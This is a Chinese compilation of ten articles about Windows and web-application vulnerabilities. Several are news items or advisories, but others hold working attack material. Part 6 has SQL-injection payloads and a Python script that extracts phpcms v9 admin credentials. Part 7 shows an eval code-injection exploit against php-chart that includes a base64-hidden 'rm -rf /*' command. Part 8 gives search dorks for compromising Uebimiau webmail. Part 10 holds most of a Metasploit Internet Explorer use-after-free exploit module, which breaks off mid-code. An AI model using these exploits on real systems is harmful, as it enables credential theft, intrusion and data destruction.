下面是小编为大家整理的首个Windows严重漏洞利用代码出炉,本文共10篇,仅供大家参考借鉴,希望大家喜欢!
篇1:首个Windows严重漏洞利用代码出炉
一个刚刚发布的利用今年第一个Windows安全漏洞的概念证明让安全研究人员敲响了警钟,
微软1月8日发布的第一个编号为MS08-001的安全公告披露了一个TCP/IP安全漏洞。利用这个安全漏洞的概念证明代码已经在上周添加到了Immunity公司的CANVAS入侵测试软件中。Immunity首席技术官Dave Aitel上周四警告称,微软可能过高估计了创建利用这个安全漏洞的代码的难度。
微软在发布MS08-001安全公告时披露了Windows的TCP/IP协议中有多个安全漏洞之后,微软的一位产品经理在安全漏洞研究与防御博客中发表文章说,利用这个漏洞实施的任何攻击都必须要靠运气才能成功。
微软可信赖计算事业部产品经理Michael Grady争辩说,尽管微软把这个安全漏洞列为对于XP和Vista操作系统都是“严重”等级,但是,有许多因素使利用这个安全漏洞非常困难,在现实世界条件下几乎是不可能的。这些因素包括利用安全漏洞的代码将消耗计算机CPU的多数处理能力,而且实施攻击需要灵活掌握时机,
Aitel表示,攻击者能够攻击这个安全漏洞,特别是在局域网环境中。
还有一些公司也怀疑微软对新安全漏洞的评价。赛门铁克在提供给其DeepSight安全网络客户的研究报告中称,创建一个可靠的利用这个安全漏洞的代码显然是可能的。即使创建这个利用安全漏洞的代码很困难,这个工作的回报是非常高的。因为这可能一次攻破无数的系统。
赛门铁克提醒用户称,无论什么时候出现概念证明代码,这种攻击的可能性都会增加。概念证明代码的出现是一个可靠的指示器,表明攻击和防御的团体的兴趣和重点都集中到了这个安全漏洞。以前提出的保护用户不受MS08-001安全漏洞攻击的措施是不充分的。例如,Windows XP的防火墙不能阻止针对这个安全漏洞的广播攻击。流行的第三方安全软件,如赛门铁克自己的网络安全特警2008套装软件和McAfee的互联网安全套装软件2008,都不能阻止针对这个安全漏洞的攻击。赛门铁克在1月19日敦促用户尽快使用修复这个安全漏洞的补丁。
CANVAS概念证明代码攻击这个TCP/IP安全漏洞在未来几个月将扮演重要角色。安全专家预言,这个安全漏洞将是20最大的安全漏洞之一。
篇2:WINDOWS密码泄露漏洞相关代码及分析
漏洞说明:
WINDOWS系统访问共享文件时(file:协议,可以在HTM里面夹杂此协议),会自动试着以当前用户的身份连接(发送用户名、加密的密码),如果不能连接才提示用户输入用户名和密码,所以造成密码泄漏,
影响版本:WIN95、WIN98、WINNT、WIN。
补救措施:找微软。
下面是WIN98系统的泄露密码相关代码分析。这是文件VREDIR.VXD的一段代码:
15760 sub_0285 proc near
15760 55 push ebp
15761 8B EC mov ebp,esp
15763 83 EC 0C sub esp,0Ch
15766 33 C0 xor eax,eax
15768 53 push ebx
15769 56 push esi
1576A 57 push edi
1576B 8B 7D 08 mov edi,dword ptr [ebp+PARAMETER_1]
1576E 8B 5D 14 mov ebx,dword ptr [ebp+PARAMETER_4]
15771 66| C7 43 01 00FF mov word ptr [ebx+1],0FFh
15777 8B 77 1C mov esi,dword ptr [edi+1Ch]
1577A 8A 47 05 mov al,byte ptr [edi+5]
1577D 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15780 C6 03 0D mov byte ptr [ebx],0Dh
15783 8B 0C 85 00000AE0 mov ecx,dword ptr data_0114[eax*4] ;
1578A 8B 45 18 mov eax,dword ptr [ebp+PARAMETER_5]
1578D 66| 89 43 05 mov word ptr [ebx+5],ax
15791 89 4D F8 mov dword ptr [ebp+LOCAL_2],ecx
;the login user block 用户信息块
15794 66| 0F B6 4A 18 movzx cx,byte ptr [edx+18h]
15799 66| 89 4B 07 mov word ptr [ebx+7],cx
1579D 8D 42 2C lea eax,dword ptr [edx+2Ch]
157A0 ?0 push eax
157A1 E8 FFFFFADA call sub_0282
157A6 66| 89 43 09 mov word ptr [ebx+9],ax
157AA 83 C4 04 add esp,4
157AD C7 43 13 00000000 mov dword ptr [ebx+13h],0
157B4 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
157B7 C7 43 17 00000000 mov dword ptr [ebx+17h],0
157BE 8B 4A 28 mov ecx,dword ptr [edx+28h]
157C1 89 4B 0B mov dword ptr [ebx+0Bh],ecx
;key
157C4 66| 8B 4A 1A mov cx,word ptr [edx+1Ah]
157C8 66| 8B C1 mov ax,cx
157CB 66| 25 0200 and ax,200h
157CF 66| 3D 0001 cmp ax,1
157D3 B8 00000000 mov eax,0
157D8 83 D0 FF adc eax,0FFFFFFFFh
157DB 66| 83 E1 03 and cx,3
157DF 83 E0 04 and eax,4
157E2 66| 83 F9 01 cmp cx,1
157E6 89 43 17 mov dword ptr [ebx+17h],eax
157E9 1B C9 sbb ecx,ecx
157EB 41 inc ecx
157EC 0B C8 or ecx,eax
157EE 83 7D F8 00 cmp dword ptr [ebp+LOCAL_2],0
157F2 89 4B 17 mov dword ptr [ebx+17h],ecx
157F5 0F 84 00000244 jz loc_1740
157FB 8A 4A 19 mov cl,byte ptr [edx+19h]
; SECURITY MODE 安全模式
;是服务方发过来的数据,所以服务方可以主动按其需要修改
157FE F6 C1 01 test cl,1
15801 0F 84 000001CB jz loc_1739
; USER OR SHARE MODE
;共享控制的跳转
15807 80 7F 05 02 cmp byte ptr [edi+5],2
1580B 75 53 jne short loc_1729
1580D 8B 45 F8 mov eax,dword ptr [ebp+LOCAL_2]
15810 8B 70 28 mov esi,dword ptr [eax+28h]
15813 85 F6 test esi,esi
15815 74 12 jz short loc_1726
15817 8D 7B 1D lea edi,dword ptr [ebx+1Dh]
1581A B9 00000006 mov ecx,6
1581F F3/ A5 rep movsd
15821 66| C7 43 0F 0018 mov word ptr [ebx+0Fh],18h
;PASSWORD LONG
15827 EB 06 jmp short loc_1727
15829 loc_1726:
15829 66| C7 43 0F 0000 mov word ptr [ebx+0Fh],0
1582F loc_1727:
1582F 33 C0 xor eax,eax
15831 8B 4D F8 mov ecx,dword ptr [ebp+LOCAL_2]
15834 66| 8B 43 0F mov ax,word ptr [ebx+0Fh]
15838 8B 71 2C mov esi,dword ptr [ecx+2Ch]
1583B 85 F6 test esi,esi
1583D 8D 7C 18 1D lea edi,dword ptr [eax+1Dh][ebx]
15841 74 12 jz short loc_1728
15843 B9 00000006 mov ecx,6
15848 F3/ A5 rep movsd
1584A 66| C7 43 11 0018 mov word ptr [ebx+11h],18h
15850 E9 000000E8 jmp loc_1736
15855 loc_1728:
15855 66| C7 43 11 0000mov word ptr [ebx+11h],0
1585B E9 000000DD jmp loc_1736
15860 loc_1729:
15860 C7 45 FC 00001A78 mov dword ptr [ebp+LOCAL_1],1A78h
15867 F6 46 1C 20 test byte ptr [esi+1Ch],20h
1586B 74 08 jz short loc_1730
1586D 83 C6 35 add esi,35h
15870 89 75 FC mov dword ptr [ebp+LOCAL_1],esi
15873 EB 12 jmp short loc_1731
15875 loc_1730:
15875 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15878 8B 42 0C mov eax,dword ptr [edx+0Ch]
1587B F6 40 1C 20 test byte ptr [eax+1Ch],20h
1587F 74 06 jz short loc_1731
15881 83 C0 35 add eax,35h
;THE PASSWORD POINTER
15884 89 45 FC mov dword ptr [ebp+LOCAL_1],eax
15887 loc_1731:
15887 8B 45 FC mov eax,dword ptr [ebp+LOCAL_1]
1588A 80 38 00 cmp byte ptr [eax],0;
;THE PASSWORD
1588D 75 09 jne short loc_1732
;比较看有否输入密码,如果没有密码就用用户密码替换
;因为开始还没有出来提示输入密码时就有好几次密码实验,
;所以一定有没有密码的情况,也就泄露了当前用户密码
1588F 8B 45 F8 mov eax,dword ptr [ebp+LOCAL_2]
15892 83 C0 05 add eax,5
15895 89 45 FC mov dword ptr [ebp+LOCAL_1],eax
篇3:Windows系统再爆三大严重漏洞
12月23日,江民公司反病毒中心监测到,Windows系统的3个最新漏洞及其技术细节被公布在网上,它们分别是:LoadImage API堆溢出漏洞、Winhlp32.exe堆溢出漏洞和ANI光标文件处理内核崩溃漏洞。
其中,LoadImage堆溢出漏洞的利用方式与前段时间的JPEG漏洞类似,用户在浏览利用此漏洞的网页时,即有可能被病毒或恶意程序感染。除Windows XP SP2外,其余几乎所有NT操作系统(括Windows NT、Windows 2000 SP0~SP4、Windows XP SP0~SP1和Windows )都受此漏洞影响,
Winhlp32.exe漏洞会影响包括Windows XP SP2在内的几乎所有Windows操作系统。利用此漏洞, 可以制作一个特别的帮助文件(.hlp文件),触发溢出,可能导致任意代码执行。
ANI处理内核崩溃漏洞不影响Windows XP SP2系统,利用此漏洞,远程攻击者可以通过WEB页面使得被攻击系统立刻蓝屏重启或者内核陷入死锁。
江民反病毒专家介绍,此3个漏洞的危险级别都很严重,江民公司正在密切关注事态发展,同时提醒广大用户,尽量不要访问不明网站,收到不明文件时也不要打开,及时升级KV病毒库,打开实时监控功能,以免遭到病毒攻击。
篇4:Windows动态图标处理爆严重漏洞Windows安全
3月30日,江民公司反病毒中心监测到,一些恶意网站正在通过Windows操作系统一个新的安全漏洞传播木马病毒,Windows在处理动态图标文件时存在严重隐患,利用此漏洞, 可以通过制作特殊的ANI文件进行远程攻击。可能的攻击方式包括编写恶意网页或发送恶意电子邮件,用户一旦浏览即可执行 指定的任意代码。微软公司于当地时间3月29日确认了这个新漏洞并开始调查工作。目前没有针对该漏洞的补丁程序。
目前已经发现了若干国内网站利用该漏洞进行木马传播的例子,此漏洞有可能成为网页种植木马的又一“利器”,
请广大网民在上网时不要浏览来源不明的网站和电子邮件,一定要开启杀毒软件的系统监测实时监控功能,进行网页“滤毒”处理,并及时升级病毒库。
关 键 字:Windows安全
篇5:Windows再曝严重漏洞影响到媒体播放器和IE
据一安全公司周一晚些时候报道,一个同时影响到微软的媒体播放器(WindowsMediaPlayer)和IE浏览器的“严重”漏洞被研究人员发现,
据电子眼数字安全公司(eEyeDigitalSecurity)发布的一份安全公告称,这个安全漏洞是在WindowsMediaPlayer和IE默认安装程序中发现的,它可能允许黑对代码进行远程控制。
该漏洞存在于安装了和的WindowsXP,WindowsNT以及Windows000系统的各种版本。
电子眼数字安全公司的一位代表称,虽然该公司认为这个漏洞不会受到蠕虫病毒攻击,但是因为该漏洞可以允许 进行远程代码控制以及影响到MediaPlayer和IE在默认环境中的安装,因此该公司将它评级为“严重”,
微软一位发言人证实该公司收到了电子眼数字安全公司的通报,但他表示,由于该漏洞的详细情况没有被公开,所以目前尚未发现利用该漏洞进行攻击的事件发生。
该发言人还表示,微软安全反应中心仍在对此报告进行研究。
就在几天前,微软发布安全公告称,它上周发布的个安全补丁中,有一个安全补丁存在问题:它可能使用户无法进入他们的PC系统。
电子眼数字安全公司称,最新发现的这一漏洞和上周发布的任何一个补丁都无关联。
篇6:phpcms postclick注入0day利用代码漏洞预警
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
问题函数phpcmsmodulesposterindex.php
public function poster_click {
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$r = $this->db->get_one(array('id'=>$id));
if (!is_array($r) && empty($r)) return false;
$ip_area = pc_base::load_sys_class('ip_area');
$ip = ip();
$area = $ip_area->get($ip);
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
if($id) {
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
}
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$setting = string2array($r['setting']);
if (count($setting)==1) {
$url = $setting['1']['linkurl'];
} else {
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
}
header('Location: '.$url);
}
利用方式:
1、可以采用盲注入的手法:
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
通过返回页面,正常与否一个个猜解密码字段,
2、代码是花开写的,随手附上了:
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
此方法是爆错注入手法,原理自查,
利用程序:
#!/usr/bin/env python
import httplib,sys,re
def attack():
print “Code by Pax.Mac Team conqu3r!”
print “Welcome to our zone!!!”
url=sys.argv[1]
paths=sys.argv[2]
conn = httplib.HTTPConnection(url)
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/0624 Firefox/3.5″,
“Accept”: “text/plain”,
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
r1 = conn.getresponse()
datas=r1.read()
datas=re.findall(r”Duplicate entry ’w+’”, datas)
print datas[0]
conn.close()
if __name__==”__main__”:
if len(sys.argv)<3:
print “Code by Pax.Mac Team conqu3r”
print “Usgae:”
print “ phpcmsattack.py www.paxmac.org /”
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
sys.exit(1)
attack()
篇7:利用本地包含漏洞执行任意代码漏洞预警
影响程序: php-chart_v1.0
程序官方: php-charts.com/
缺陷类型: PHP Code Execution.
===============================================================
测试平台系统: Debian squeeze 6.0.6
服务器软件版本: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 20:08:59)
Copyright (c) -2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) - Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) -2010, by SektionEins GmbH
================================================================
关于程序介绍:
Php-Charts is basically a class which can be used to generate
different charts(Bar, Pie, Doughnut etc.) in different format(PDF, PNG, JPG, HTML)
using different data source(csv, xml, MySQL, MS Sql, MS Access, PostgreSql,
user defined data).
================================================================
缺陷分析
root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php
require(“../lib/phpchart.class.php”);
$color_var=array(“txt_col”,“line_col”,“bg_color”);
$cname=$_GET[“type”];
$chart=new PHPChart($cname);
foreach($_GET as $key=>$value)
{
if($value!=“”)
{
if(in_array($key,$color_var))
eval('$chart->'.$key.'=“#'.$value.'”;');
else if($value=='yes')
eval('$chart->'.$key.'=true;');
else if($value=='no')
eval('$chart->'.$key.'=false;');
else if(is_numeric($value))
eval('$chart->'.$key.'='.$value.';');
else
eval('$chart->'.$key.“='”.$value.“';”);
}
}
$chart->genChart();
利用:
root@debian:/tmp# wget ' www.myhack58.com //wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt
---01-15 21:19:16-- hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “out.txt”
[ <=> ] 1,917 --.-K/s in 0s
2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]
Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4
array(28) {
[“DOCUMENT_ROOT”]=>
string(28) “/etc/apache2/htdocs/hacker1/”
[“GATEWAY_INTERFACE”]=>
string(7) “CGI/1.1”
[“HTTP_ACCEPT”]=>
string(3) “*/*”
[“HTTP_CLIENT_IP”]=>
string(9) “127.0.0.1”
[“HTTP_HOST”]=>
string(11) “hacker1.own”
[“HTTP_USER_AGENT”]=>
string(21) “Wget/1.12 (linux-gnu)”
[“HTTP_VIA”]=>
string(77) “http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)”
[“HTTP_X_FORWARDED_FOR”]=>
string(9) “127.0.0.1”
[“PATH”]=>
string(4) “/bin”
[“PHPRC”]=>
string(14) “/etc/php5/cgi/”
[“QUERY_STRING”]=>
string(45) “$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY”
[“REDIRECT_STATUS”]=>
string(3) “200”
[“REMOTE_ADDR”]=>
string(9) “127.0.0.1”
[“REMOTE_PORT”]=>
string(5) “60830”
[“REQUEST_METHOD”]=>
string(3) “GET”
[“REQUEST_URI”]=>
string(76) “/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY”
[“SCRIPT_FILENAME”]=>
string(57) “/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php”
[“SCRIPT_NAME”]=>
string(30) “/wp/chart/chart/wizard/url.php”
[“SERVER_ADDR”]=>
string(9) “127.0.0.1”
[“SERVER_ADMIN”]=>
string(21) “webmaster@hacker1.own”
[“SERVER_NAME”]=>
string(11) “hacker1.own”
[“SERVER_PORT”]=>
string(2) “80”
[“SERVER_PROTOCOL”]=>
string(8) “HTTP/1.1”
[“SERVER_SIGNATURE”]=>
string(0) “”
[“SERVER_SOFTWARE”]=>
string(6) “Apache”
[“UNIQUE_ID”]=>
string(24) “UPYOJH8AAQEAAE8eNfMAAAAC”
[“PHP_SELF”]=>
string(30) “/wp/chart/chart/wizard/url.php”
[“REQUEST_TIME”]=>
int(1358302756)
}
Notice: Undefined variable: in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
root@debian:/tmp#
Example 2:
hacker1.own//wp/chart/chart/wizard/url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL
=====================ENDS HERE============================
篇8:远程文件执行代码漏洞利用方法漏洞预警
goole 搜 Uebimiau Webmail
地址后面加 /uebimiau/admin/editor.php?load=config 被人拿了 加 /uebimiau/index.php?cmd=id
全部是外国的 ,,,高手可以玩玩,。。。。。。
漏洞公布时间 6 。12
==========================================================
Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
Dork : Uebimiau Webmail v3.2.0-1.8
POC :
/uebimiau/admin/editor.php?load=config
And You Can Write Any Code As
Go
/uebimiau/index.php?cmd=id
See Pic :www.almlf.com/get-6-2009-almlf_com_akszizl2.png
Thanx To
篇9:MS09006漏洞:Windows内核中允许远程执行代码
摘要
此安全更新可解决 Windows 内核中许多秘密报告的漏洞, 如果用户从一个受影响的系统查看特制的 EMF 或 WMF 图像文件,则最严重的漏洞可能允许远程执行代码,
建议。大多数客户均启用了自动更新,他们不必采取任何操作,因为此安全更新将自动下载并安装。 尚未启用自动更新的客户必须检查更新,并手动安装此更新。
对于管理员、企业安装或者想要手动安装此安全更新的最终用户,Microsoft 建议客户使用更新管理软件立即应用此更新或者利用 Microsoft Update 服务检查更新。
篇10:windows下ieiepeers.dll释放后重利用漏洞漏洞预警
漏洞详情请查看:ms10_018,technet.microsoft.com/en-us/security/bulletin/MS10-018
关键的,如果metasploit里没有这个exploit,可以在此下载:www.rec-sec.com/index.php
这里也贴一下吧:将此ruby代码直接保存到framework/msf3/modules/exploits/windows/browser下即可,比如起名为ie_iepeers_pointer.rb,就可以正常使用了,
##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Internet Explorer iepeers.dll use-after-free',
'Description' => %q{
This module exploits a use-after-free vulnerability within iepeers.dll of
Microsoft Internet Explorer versions 6 and 7.
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
'License' => MSF_LICENSE,
'Author' => [
'Trancer
],
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2010-0806' ],
[ 'OSVDB', '62810' ],
[ 'BID', '38615' ],
[ 'URL', 'www.microsoft.com/technet/security/advisory/981374.mspx' ],
[ 'URL', 'www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => “x00x09x0ax0d'”,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the returnnops
ret = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize the javascript. variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Build out the message
html = %Q|
文档为doc格式